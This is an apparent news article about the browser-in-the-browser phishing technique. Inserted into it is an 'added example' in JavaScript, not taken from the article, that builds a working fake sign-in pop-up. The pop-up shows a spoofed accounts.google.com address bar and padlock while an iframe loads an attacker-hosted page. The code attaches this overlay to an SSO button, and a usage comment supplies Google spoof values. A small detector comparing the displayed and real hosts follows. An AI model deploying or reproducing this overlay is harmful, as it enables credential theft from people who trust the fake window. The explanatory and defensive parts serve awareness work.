A new phishing technique dubbed browser-in-the-browser (BitB) attack allows threat actors to simulate a browser window within a browser, spoofing a legitimate domain and initiating a convincing phishing attack.
A penetration tester and security researcher, known as mrd0x on Twitter, explained how the method takes advantage of third-party single sign-on (SSO) options on websites such as “Sign in with Google” (or Facebook, Apple, or Microsoft).
The default behaviour of sign-in methods such as these is to greet users with a pop-up window to complete the authentication process. BitB attacks aim to replicate this process using a mix of HTML and CSS code, presenting users with a fabricated browser window that is drawn inside the attacker's own page rather than opened by the browser.
“Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it’s basically indistinguishable,” mrd0x said in a technical write-up published last week. “JavaScript can be easily used to make the window appear on a link or button click, on the page loading etc.”
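The construction mrd0x describes, written out as an added example (this is not mrd0x's code or anything from the IT Security Guru article): the window chrome, padlock and address bar are plain HTML/CSS text under the attacker's control, while an iframe loads the actual phishing page from the attacker's host. The hostnames `accounts.google.com` (as the spoofed label) and `attacker.example.net` (as the real iframe source) are constructed for illustration. A small defender-side helper at the end shows the only thing that can be checked in the markup: what the iframe really loads versus what the painted address bar claims.

```javascript
// Added example, not the researcher's or the article's code. Hostnames are constructed.

// Builds the fake "popup": window chrome drawn with HTML/CSS, a fake address bar
// showing the legitimate domain, and an iframe that actually loads the attacker page.
function buildFakeWindowHtml({ title, spoofedUrl, iframeSrc }) {
  const esc = (s) => String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
  return [
    '<div class="bitb-window" style="position:fixed;top:80px;left:120px;width:480px;',
    'border:1px solid #999;border-radius:8px;background:#fff;box-shadow:0 4px 16px rgba(0,0,0,.4);">',
    '  <div class="bitb-titlebar" style="padding:6px 10px;background:#f1f3f4;font:13px sans-serif;">',
    `    ${esc(title)}`,
    '  </div>',
    '  <div class="bitb-addressbar" style="padding:4px 10px;font:12px monospace;color:#202124;">',
    // The padlock and URL are just characters the attacker typed; the browser verifies none of it.
    `    &#128274; <span class="bitb-url">${esc(spoofedUrl)}</span>`,
    '  </div>',
    // The real content comes from the attacker's server, not from the displayed URL.
    `  <iframe src="${esc(iframeSrc)}" style="width:100%;height:520px;border:0"></iframe>`,
    '</div>',
  ].join('\n');
}

// Attaches the fake window to the DOM when the "Sign in with ..." trigger is clicked,
// as the write-up describes. Returns false (and does nothing) outside a browser.
function installFakePopup(triggerSelector, opts) {
  if (typeof document === 'undefined') return false;
  const trigger = document.querySelector(triggerSelector);
  if (!trigger) return false;
  trigger.addEventListener('click', (e) => {
    e.preventDefault();
    const host = document.createElement('div');
    host.innerHTML = buildFakeWindowHtml(opts);
    document.body.appendChild(host);
  });
  return true;
}

// Defender side: for each fake window in the markup, report the host the painted
// address bar shows versus the host the iframe really loads. This regex keys on the
// class names used above, so it is a demonstration of the discrepancy, not a
// general-purpose BitB detector for arbitrary pages.
function findSpoofedWindows(html) {
  const findings = [];
  const windowRe = /<div class="bitb-window"[\s\S]*?<\/iframe>\s*<\/div>/g;
  for (const block of html.match(windowRe) || []) {
    const shown = /class="bitb-url">([^<]+)</.exec(block);
    const real = /<iframe src="([^"]+)"/.exec(block);
    if (!shown || !real) continue;
    const shownHost = new URL(shown[1]).host;
    const realHost = new URL(real[1]).host;
    if (shownHost !== realHost) findings.push({ shownHost, realHost });
  }
  return findings;
}

// Usage (constructed values): installFakePopup('#sso-google', {
//   title: 'Sign in - Google Accounts',
//   spoofedUrl: 'https://accounts.google.com/o/oauth2/auth',
//   iframeSrc: 'https://attacker.example.net/login.html',
// });
```

The practical consequence for users and awareness training: the padlock and URL inside the fake window prove nothing, because they are rendered by the attacker's page. The genuine browser address bar belongs to the attacker's site throughout, and because the fake window is only a DOM element it cannot be dragged outside the parent tab's viewport, whereas a real SSO pop-up is a separate window that can.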
The post New attack technique makes phishing near undetectable appeared first on IT Security Guru.